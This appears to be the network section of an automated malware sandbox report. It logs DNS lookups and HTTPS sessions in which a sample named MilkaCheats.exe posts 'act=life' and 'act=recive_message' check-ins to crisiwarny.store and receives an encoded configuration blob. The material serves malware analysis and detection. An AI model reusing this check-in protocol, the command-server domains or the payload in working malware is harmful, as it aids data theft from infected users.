                                                                                            Oct 27, 2024 16:45:05.708048105 CET49740443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:05.708091021 CET44349740172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:05.708195925 CET49740443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:05.708578110 CET49740443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:05.708596945 CET44349740172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:06.427710056 CET44349740172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:06.427803040 CET49740443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:06.429538012 CET49740443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:06.429552078 CET44349740172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:06.430481911 CET44349740172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:06.440917015 CET49740443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:06.441025972 CET49740443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:06.441078901 CET44349740172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:06.441155910 CET49740443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:06.441168070 CET44349740172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:07.350929022 CET44349740172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:07.351172924 CET44349740172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:07.351320028 CET49740443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:07.351320028 CET49740443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:08.456089020 CET49741443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:08.456171036 CET44349741172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:08.456249952 CET49741443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:08.456559896 CET49741443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:08.456595898 CET44349741172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:09.080773115 CET44349741172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:09.080873013 CET49741443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:09.082339048 CET49741443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:09.082389116 CET44349741172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:09.083462954 CET44349741172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:09.084817886 CET49741443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:09.084922075 CET49741443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:09.084935904 CET44349741172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:09.623411894 CET44349741172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:09.623642921 CET44349741172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:09.623681068 CET49741443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:09.623745918 CET49741443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:10.104568958 CET49743443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:10.104650021 CET44349743172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:10.104788065 CET49743443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:10.105113029 CET49743443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:10.105148077 CET44349743172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:10.734853983 CET44349743172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:10.734956026 CET49743443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:10.763633013 CET49743443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:10.763689995 CET44349743172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:10.764102936 CET44349743172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:10.785723925 CET49743443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:10.786556005 CET49743443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:10.786645889 CET44349743172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:10.786739111 CET49743443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:10.786798954 CET44349743172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:10.786943913 CET49743443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:10.786998987 CET44349743172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:10.787116051 CET49743443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:10.787199974 CET44349743172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:10.787412882 CET49743443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:10.787477016 CET44349743172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:10.787678003 CET49743443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:10.787729025 CET44349743172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:10.787746906 CET49743443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:10.787775993 CET44349743172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:10.787873030 CET49743443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:10.787915945 CET44349743172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:10.787961960 CET49743443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:10.788053036 CET49743443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:10.788105965 CET49743443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:10.798275948 CET44349743172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:10.798487902 CET49743443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:10.798579931 CET44349743172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:10.798597097 CET49743443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:10.798650026 CET44349743172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:10.798737049 CET49743443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:10.803807974 CET44349743172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:14.153851032 CET44349743172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:14.154079914 CET44349743172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:14.154117107 CET49743443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:14.154182911 CET49743443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:14.181072950 CET49748443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:14.181140900 CET44349748172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:14.181287050 CET49748443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:14.181586027 CET49748443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:14.181617975 CET44349748172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:14.799938917 CET44349748172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:14.800046921 CET49748443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:14.801332951 CET49748443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:14.801362038 CET44349748172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:14.801708937 CET44349748172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:14.802979946 CET49748443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:14.803020000 CET49748443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:14.803078890 CET44349748172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:15.310168028 CET44349748172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:15.310380936 CET44349748172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:15.310472965 CET49748443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:15.310549021 CET49748443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:15.310594082 CET44349748172.67.170.64192.168.2.4
                                                                                            Oct 27, 2024 16:45:15.310622931 CET49748443192.168.2.4172.67.170.64
                                                                                            Oct 27, 2024 16:45:15.310637951 CET44349748172.67.170.64192.168.2.4
                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Oct 27, 2024 16:44:57.889862061 CET4997453192.168.2.41.1.1.1
                                                                                            Oct 27, 2024 16:44:57.901324987 CET53499741.1.1.1192.168.2.4
                                                                                            Oct 27, 2024 16:44:57.904257059 CET6166553192.168.2.41.1.1.1
                                                                                            Oct 27, 2024 16:44:57.914037943 CET53616651.1.1.1192.168.2.4
                                                                                            Oct 27, 2024 16:44:57.952079058 CET5568253192.168.2.41.1.1.1
                                                                                            Oct 27, 2024 16:44:57.967638969 CET53556821.1.1.1192.168.2.4
                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                            Oct 27, 2024 16:44:57.889862061 CET192.168.2.41.1.1.10x4bffStandard query (0)messejawu.storeA (IP address)IN (0x0001)false
                                                                                            Oct 27, 2024 16:44:57.904257059 CET192.168.2.41.1.1.10xf44fStandard query (0)presticitpo.storeA (IP address)IN (0x0001)false
                                                                                            Oct 27, 2024 16:44:57.952079058 CET192.168.2.41.1.1.10xcec6Standard query (0)crisiwarny.storeA (IP address)IN (0x0001)false
                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                            Oct 27, 2024 16:44:57.901324987 CET1.1.1.1192.168.2.40x4bffName error (3)messejawu.storenonenoneA (IP address)IN (0x0001)false
                                                                                            Oct 27, 2024 16:44:57.914037943 CET1.1.1.1192.168.2.40xf44fName error (3)presticitpo.storenonenoneA (IP address)IN (0x0001)false
                                                                                            Oct 27, 2024 16:44:57.967638969 CET1.1.1.1192.168.2.40xcec6No error (0)crisiwarny.store172.67.170.64A (IP address)IN (0x0001)false
                                                                                            Oct 27, 2024 16:44:57.967638969 CET1.1.1.1192.168.2.40xcec6No error (0)crisiwarny.store104.21.95.91A (IP address)IN (0x0001)false
                                                                                            • crisiwarny.store
                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.449730172.67.170.644436428C:\Users\user\Desktop\MilkaCheats.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-10-27 15:44:58 UTC263OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 8
                                                                                            Host: crisiwarny.store
                                                                                            2024-10-27 15:44:58 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                            Data Ascii: act=life
                                                                                            2024-10-27 15:44:59 UTC1013INHTTP/1.1 200 OK
                                                                                            Date: Sun, 27 Oct 2024 15:44:59 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=l7m9ojf4da84pd9idm6gmh38ni; expires=Thu, 20 Feb 2025 09:31:38 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gjkak7vpO5A8wdnT3gQ7Ov94k%2Fa%2FpztG6Uzq%2FatXNFu6M3EOJFCxyCciFKLjpjENmVdwrTF07f5OrFd0Ojghe5tT%2FrZzhAmms%2FpYEqhmrV9lk4iPCNTdQKK8sCgPClB%2B0huQ"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8d93cf806f56478b-DFW
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1615&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=907&delivery_rate=1783251&cwnd=251&unsent_bytes=0&cid=cad30245dbcea1fe&ts=774&x=0"
                                                                                            2024-10-27 15:44:59 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                            Data Ascii: 2ok
                                                                                            2024-10-27 15:44:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            1192.168.2.449732172.67.170.644436428C:\Users\user\Desktop\MilkaCheats.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-10-27 15:45:00 UTC264OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 52
                                                                                            Host: crisiwarny.store
                                                                                            2024-10-27 15:45:00 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 35 35 37 34 33 34 30 36 32 35 26 6a 3d
                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=yau6Na--5574340625&j=
                                                                                            2024-10-27 15:45:01 UTC1012INHTTP/1.1 200 OK
                                                                                            Date: Sun, 27 Oct 2024 15:45:01 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=r0hkrrnvkjit9ajn33pnuh6ogu; expires=Thu, 20 Feb 2025 09:31:40 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OtPSKhWP4ZNkHN3kBx7Jt3pVLAAvFj%2B2Q6IicEGeEt%2FGwfm1LFAyOpCz3QkF2rdbY11Cv5378yepWZYky3E%2BrIT7r%2BLlrvbvvUn7phMgfEEzo2J86K5n%2FOKZmg2xcl6yuney"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8d93cf89dd8ce946-DFW
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1277&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=952&delivery_rate=2195602&cwnd=251&unsent_bytes=0&cid=9ea3799169a70fe4&ts=1296&x=0"
                                                                                            2024-10-27 15:45:01 UTC357INData Raw: 32 64 64 33 0d 0a 32 7a 59 4a 65 38 6c 4e 4f 70 6a 64 55 46 70 42 71 56 6d 34 73 30 6f 43 73 54 6f 6e 4b 44 6a 53 71 58 42 6c 53 69 37 39 4c 6e 36 67 46 48 39 5a 38 33 6b 57 75 71 34 31 65 48 76 64 4b 38 33 57 5a 69 44 51 58 67 55 53 58 72 50 46 41 77 42 6d 44 49 74 44 58 4f 46 51 61 42 65 36 4b 42 61 36 75 43 68 34 65 2f 49 69 6d 74 59 6b 49 49 73 59 51 6b 4a 61 73 38 55 53 42 43 46 42 6a 55 49 64 73 31 70 75 45 36 77 75 58 76 6d 78 50 54 38 6b 7a 44 6a 53 33 53 4e 76 32 56 63 46 42 42 71 33 30 31 4a 66 61 47 4f 59 57 68 2b 57 56 33 6f 51 36 7a 41 57 34 2f 38 31 4e 47 4f 54 65 39 6e 57 4b 47 37 58 58 6b 78 41 55 4c 72 4e 45 77 45 67 58 70 52 49 46 72 4e 55 62 52 4b 6d 4a 30 72 30 75 7a 6f 30 49 73 59 34 6d 70 39 6f 5a 38 73 59 48 51 6f 4a 67 73 67 44 46
                                                                                            Data Ascii: 2dd32zYJe8lNOpjdUFpBqVm4s0oCsTonKDjSqXBlSi79Ln6gFH9Z83kWuq41eHvdK83WZiDQXgUSXrPFAwBmDItDXOFQaBe6KBa6uCh4e/IimtYkIIsYQkJas8USBCFBjUIds1puE6wuXvmxPT8kzDjS3SNv2VcFBBq301JfaGOYWh+WV3oQ6zAW4/81NGOTe9nWKG7XXkxAULrNEwEgXpRIFrNUbRKmJ0r0uzo0IsY4mp9oZ8sYHQoJgsgDF
                                                                                            2024-10-27 15:45:01 UTC1369INData Raw: 6f 74 7a 6b 7a 4a 74 6b 77 30 39 77 6c 59 4e 35 53 53 6b 6c 61 74 38 45 59 43 43 4a 49 6b 6b 45 61 75 56 51 72 56 2b 73 6f 51 4c 72 6e 63 68 73 6d 32 7a 7a 57 78 32 70 61 6b 30 63 4c 55 78 71 33 78 31 4a 66 61 45 53 61 54 78 2b 79 57 32 67 52 6f 44 31 59 36 4c 6b 2f 50 54 48 4e 50 74 54 62 4b 33 4c 5a 56 6b 4e 4a 55 37 76 43 46 77 41 73 44 4e 45 4d 47 36 45 55 4d 31 6d 4b 49 6c 50 32 74 53 55 34 59 39 52 31 77 35 45 76 62 4a 4d 41 42 55 35 62 74 4d 6f 57 43 53 5a 49 6b 30 6f 53 74 46 74 74 45 36 73 6f 55 76 4b 33 4d 7a 55 6f 78 44 76 66 33 43 78 6d 33 31 6c 41 43 68 54 77 7a 41 70 48 63 41 79 78 53 78 2b 72 46 6c 34 61 70 53 46 66 37 50 38 74 64 6a 71 4c 50 4e 61 52 63 43 44 64 58 55 70 59 57 36 4c 4f 48 42 55 6b 53 5a 6c 42 48 37 64 55 62 68 36 6d 49 56
                                                                                            Data Ascii: otzkzJtkw09wlYN5SSklat8EYCCJIkkEauVQrV+soQLrnchsm2zzWx2pak0cLUxq3x1JfaESaTx+yW2gRoD1Y6Lk/PTHNPtTbK3LZVkNJU7vCFwAsDNEMG6EUM1mKIlP2tSU4Y9R1w5EvbJMABU5btMoWCSZIk0oStFttE6soUvK3MzUoxDvf3Cxm31lAChTwzApHcAyxSx+rFl4apSFf7P8tdjqLPNaRcCDdXUpYW6LOHBUkSZlBH7dUbh6mIV
                                                                                            2024-10-27 15:45:01 UTC1369INData Raw: 64 6a 71 4c 50 4e 61 52 63 43 44 66 55 55 56 42 55 4c 54 4c 46 51 6f 74 54 35 68 50 45 62 35 65 5a 52 36 76 49 31 48 33 75 54 49 2f 4a 38 34 70 33 39 67 6b 62 4a 4d 57 42 55 31 43 38 4a 4e 53 4b 43 39 61 6e 47 4d 66 71 46 30 72 42 75 55 32 47 50 32 7a 63 6d 42 6a 7a 44 37 53 32 69 35 6f 30 30 70 41 52 46 47 78 77 52 51 47 4a 55 43 5a 54 42 32 35 55 6d 63 5a 72 43 68 4b 36 4c 6f 30 4b 69 6d 4c 64 5a 72 57 4d 43 43 4c 47 48 4e 61 54 61 48 64 55 44 49 72 51 70 46 4c 43 76 6c 4c 4a 51 44 72 4b 46 53 36 35 33 49 7a 49 38 63 38 30 74 63 73 61 4e 78 58 54 46 68 62 76 4d 55 41 41 43 68 46 6b 55 4d 51 73 46 6c 73 46 4b 41 6c 56 66 36 34 4d 33 68 74 69 7a 7a 43 6b 58 41 67 35 55 68 49 52 6e 53 37 78 78 74 48 4e 77 4b 47 44 42 75 31 46 44 4e 5a 72 79 4e 51 38 4c 41
                                                                                            Data Ascii: djqLPNaRcCDfUUVBULTLFQotT5hPEb5eZR6vI1H3uTI/J84p39gkbJMWBU1C8JNSKC9anGMfqF0rBuU2GP2zcmBjzD7S2i5o00pARFGxwRQGJUCZTB25UmcZrChK6Lo0KimLdZrWMCCLGHNaTaHdUDIrQpFLCvlLJQDrKFS653IzI8c80tcsaNxXTFhbvMUAAChFkUMQsFlsFKAlVf64M3htizzCkXAg5UhIRnS7xxtHNwKGDBu1FDNZryNQ8LA
                                                                                            2024-10-27 15:45:01 UTC1369INData Raw: 7a 7a 65 31 79 63 67 6e 52 68 43 55 68 72 6f 69 7a 30 67 48 51 36 2b 64 6c 79 6d 47 6e 4a 5a 72 43 4d 59 6f 76 38 2b 4f 79 2f 44 4e 4e 7a 59 4a 47 72 61 55 30 6c 42 58 72 7a 43 46 77 45 70 53 5a 70 4e 47 4c 56 65 62 52 71 6f 49 46 66 31 74 33 4a 32 59 38 77 6a 6d 6f 6c 6f 52 63 52 54 53 30 77 61 72 34 55 4c 52 79 39 41 33 78 52 63 74 56 31 74 48 36 34 6a 57 66 79 33 4e 7a 41 6e 79 6a 33 63 30 69 64 6b 31 6c 6c 4b 54 6c 61 2b 77 52 4d 47 4a 45 65 51 52 78 6e 35 47 69 73 65 73 32 38 41 75 6f 34 78 4c 6a 54 62 4e 35 72 4f 5a 6e 6d 54 58 30 6b 4b 41 76 44 4b 41 41 30 69 51 70 70 44 47 62 70 62 62 42 53 74 49 31 4c 7a 74 7a 51 33 4b 74 6b 34 31 74 38 76 62 74 39 57 53 45 42 5a 76 59 74 63 52 79 39 55 33 78 52 63 6c 56 4e 6d 4e 36 41 6a 58 37 71 67 66 43 46 6a
                                                                                            Data Ascii: zze1ycgnRhCUhroiz0gHQ6+dlymGnJZrCMYov8+Oy/DNNzYJGraU0lBXrzCFwEpSZpNGLVebRqoIFf1t3J2Y8wjmoloRcRTS0war4ULRy9A3xRctV1tH64jWfy3NzAnyj3c0idk1llKTla+wRMGJEeQRxn5Gises28Auo4xLjTbN5rOZnmTX0kKAvDKAA0iQppDGbpbbBStI1LztzQ3Ktk41t8vbt9WSEBZvYtcRy9U3xRclVNmN6AjX7qgfCFj
                                                                                            2024-10-27 15:45:01 UTC1369INData Raw: 6c 6f 4f 4a 4e 75 51 6c 70 4b 73 34 6b 6a 45 53 74 61 6c 45 45 51 2b 55 73 6c 41 4f 73 6f 56 4c 72 6e 63 6a 34 73 77 6a 6a 56 30 43 46 73 33 6c 31 4d 54 31 75 32 7a 78 67 4e 4b 45 71 5a 54 52 6d 7a 56 32 6f 54 6f 69 68 51 2f 62 77 67 65 47 32 4c 50 4d 4b 52 63 43 44 36 58 31 64 45 53 76 44 55 58 42 35 6f 53 35 4d 4d 52 50 6c 51 59 52 61 76 4b 46 54 38 75 6a 51 31 49 73 51 36 32 74 34 73 61 39 70 65 52 45 64 66 76 63 38 41 44 53 4e 44 6b 30 55 51 74 42 51 6c 57 61 77 33 47 4b 4c 2f 41 7a 55 74 78 54 7a 4d 6b 54 63 75 79 68 68 43 52 68 72 6f 69 78 4d 4c 4a 30 2b 51 54 78 2b 34 58 6e 6b 4c 70 79 5a 51 2f 37 4d 35 4e 69 58 5a 50 64 58 59 4b 32 50 61 58 30 31 47 55 4c 50 4d 55 6b 6c 6f 53 34 63 4d 52 50 6c 33 66 41 6d 6d 62 30 65 30 70 6e 49 2f 4c 34 74 6a 6d
                                                                                            Data Ascii: loOJNuQlpKs4kjEStalEEQ+UslAOsoVLrncj4swjjV0CFs3l1MT1u2zxgNKEqZTRmzV2oToihQ/bwgeG2LPMKRcCD6X1dESvDUXB5oS5MMRPlQYRavKFT8ujQ1IsQ62t4sa9peREdfvc8ADSNDk0UQtBQlWaw3GKL/AzUtxTzMkTcuyhhCRhroixMLJ0+QTx+4XnkLpyZQ/7M5NiXZPdXYK2PaX01GULPMUkloS4cMRPl3fAmmb0e0pnI/L4tjm
                                                                                            2024-10-27 15:45:01 UTC1369INData Raw: 56 56 30 70 44 55 37 54 44 45 51 63 73 53 4a 68 4a 48 37 56 66 62 42 71 6b 4b 31 48 30 74 6a 31 34 62 59 73 38 77 70 46 77 49 50 4a 44 52 6b 5a 58 38 4e 52 63 48 6d 68 4c 6b 77 78 45 2b 56 68 6c 48 4b 73 6c 58 76 36 36 4e 44 49 6d 79 7a 44 5a 33 69 78 6d 31 31 64 46 51 56 4f 78 7a 52 63 4e 49 30 71 53 54 78 71 2f 46 43 56 5a 72 44 63 59 6f 76 38 53 49 79 37 48 50 4a 72 4f 5a 6e 6d 54 58 30 6b 4b 41 76 44 41 48 67 4d 76 54 4a 4a 50 46 4c 78 51 59 52 79 72 4a 30 72 79 76 7a 55 71 4d 63 73 79 33 39 30 72 59 4e 64 65 54 45 78 5a 74 49 74 63 52 79 39 55 33 78 52 63 6c 46 68 73 4d 4b 77 30 47 4f 58 78 4b 33 67 6b 78 33 75 43 6b 53 6c 72 32 56 64 49 53 56 79 7a 77 42 63 4e 4b 55 75 58 51 51 36 36 57 32 51 64 71 79 42 65 2f 4c 34 39 50 69 54 43 4f 74 4c 57 61 43
                                                                                            Data Ascii: VV0pDU7TDEQcsSJhJH7VfbBqkK1H0tj14bYs8wpFwIPJDRkZX8NRcHmhLkwxE+VhlHKslXv66NDImyzDZ3ixm11dFQVOxzRcNI0qSTxq/FCVZrDcYov8SIy7HPJrOZnmTX0kKAvDAHgMvTJJPFLxQYRyrJ0ryvzUqMcsy390rYNdeTExZtItcRy9U3xRclFhsMKw0GOXxK3gkx3uCkSlr2VdISVyzwBcNKUuXQQ66W2QdqyBe/L49PiTCOtLWaC
                                                                                            2024-10-27 15:45:01 UTC1369INData Raw: 58 46 43 33 32 78 55 51 4a 77 7a 52 44 42 50 35 44 46 4a 5a 6f 69 68 44 36 36 6b 2f 4b 43 53 4c 42 4a 53 52 4d 43 43 4c 47 48 42 4a 56 4c 37 4d 42 42 5a 6c 61 34 6c 47 47 36 6c 54 66 42 62 72 59 52 6a 38 2f 32 70 72 62 59 73 2f 79 35 46 77 4d 49 45 44 45 42 6b 4e 34 4a 6b 4e 53 54 45 4d 69 51 78 45 36 78 6f 72 43 2b 74 33 47 4c 32 38 49 43 6f 6c 79 43 33 5a 6c 68 5a 65 39 45 4a 49 54 45 32 68 39 53 77 41 4d 6b 47 5a 57 77 33 31 51 57 67 58 70 53 68 4f 75 76 46 79 4e 32 4f 54 41 70 71 5a 61 46 2b 64 47 46 30 4b 41 76 44 2b 45 51 6b 6d 53 34 6c 64 55 5a 35 4f 5a 68 2b 38 50 68 69 30 2f 7a 52 34 65 35 74 31 6d 74 55 35 49 49 73 49 46 78 45 50 34 35 78 43 56 54 63 43 68 67 77 4b 2b 51 77 35 56 2b 73 39 47 4b 4c 2f 64 54 73 78 32 54 33 5a 78 79 73 6e 37 57 5a
                                                                                            Data Ascii: XFC32xUQJwzRDBP5DFJZoihD66k/KCSLBJSRMCCLGHBJVL7MBBZla4lGG6lTfBbrYRj8/2prbYs/y5FwMIEDEBkN4JkNSTEMiQxE6xorC+t3GL28IColyC3ZlhZe9EJITE2h9SwAMkGZWw31QWgXpShOuvFyN2OTApqZaF+dGF0KAvD+EQkmS4ldUZ5OZh+8Phi0/zR4e5t1mtU5IIsIFxEP45xCVTcChgwK+Qw5V+s9GKL/dTsx2T3Zxysn7WZ
                                                                                            2024-10-27 15:45:01 UTC1369INData Raw: 63 67 63 43 53 39 61 6a 67 45 37 74 31 4e 71 44 37 73 34 56 37 72 78 63 6a 35 6a 6b 32 6d 55 6b 53 78 78 6b 77 41 56 47 41 48 6c 6d 45 56 58 65 6c 50 52 56 56 79 76 46 44 4e 4c 35 57 39 4b 75 75 64 79 66 79 44 5a 4b 64 7a 53 50 6d 4f 55 5a 6e 74 74 56 4c 66 4b 42 42 63 2f 51 39 42 69 4b 70 68 71 56 51 79 6f 49 56 62 39 71 53 4e 34 62 59 73 30 6d 6f 6b 52 49 4a 73 59 65 67 51 61 71 49 74 4b 52 78 31 50 6b 55 49 62 72 30 55 6d 50 71 55 6f 57 65 79 76 4a 54 64 73 35 51 33 37 6b 57 59 67 31 52 67 64 47 42 54 77 7a 77 4e 48 63 42 7a 4e 46 30 6e 71 41 7a 74 4c 74 47 46 42 75 71 6c 79 59 48 47 46 65 38 69 52 63 43 43 55 57 31 64 59 58 4c 50 64 45 55 41 57 63 72 68 43 47 37 68 43 65 78 53 6e 44 6c 76 72 74 51 77 47 4e 73 67 31 31 4e 59 2b 63 5a 4d 57 42 55 55 61
                                                                                            Data Ascii: cgcCS9ajgE7t1NqD7s4V7rxcj5jk2mUkSxxkwAVGAHlmEVXelPRVVyvFDNL5W9KuudyfyDZKdzSPmOUZnttVLfKBBc/Q9BiKphqVQyoIVb9qSN4bYs0mokRIJsYegQaqItKRx1PkUIbr0UmPqUoWeyvJTds5Q37kWYg1RgdGBTwzwNHcBzNF0nqAztLtGFBuqlyYHGFe8iRcCCUW1dYXLPdEUAWcrhCG7hCexSnDlvrtQwGNsg11NY+cZMWBUUa
